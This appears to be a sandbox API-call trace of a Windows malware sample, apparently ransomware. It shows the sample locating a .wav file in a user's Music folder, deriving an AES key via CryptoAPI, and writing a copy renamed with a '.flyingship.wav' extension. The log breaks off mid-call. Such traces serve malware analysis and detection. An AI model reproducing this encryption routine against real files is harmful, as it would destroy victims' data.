(Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.556] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.556] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.556] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.556] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.556] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821d4cf0, ftCreationTime.dwHighDateTime=0x1d5db07, ftLastAccessTime.dwLowDateTime=0x981fff30, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x981fff30, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x1e8f, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="V01OknNppjh UAhh.wav", cAlternateFileName="V01OKN~1.WAV")) returned 0x90af58 [0187.556] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.556] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.557] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.557] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0187.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0187.557] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.557] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.557] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0187.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.558] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0187.559] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.559] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.559] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0187.559] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.559] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.559] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.559] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.559] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.559] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.559] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.559] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.559] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.559] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.559] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.559] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.559] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0187.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.560] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.560] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.560] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.560] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.560] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.560] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.560] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.560] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.560] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.560] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.560] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.560] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.560] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.560] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.560] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.561] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0187.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.561] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0187.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.561] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.561] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.561] CryptHashData (hHash=0x90ae18, pbData=0x8df0a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0187.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.561] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.561] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.561] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.561] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.562] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0187.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.562] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0187.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.562] CryptDestroyHash (hHash=0x90ae18) returned 1 [0187.563] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\v01oknnppjh uahh.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0187.564] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.564] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0187.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0187.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0187.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0187.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0187.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0187.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0187.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0187.565] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0187.565] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0187.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0187.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0187.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0187.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0187.567] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n")) returned 0x10 [0187.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0187.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0187.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0187.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0187.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\v01oknnppjh uahh.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0187.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0187.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0187.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 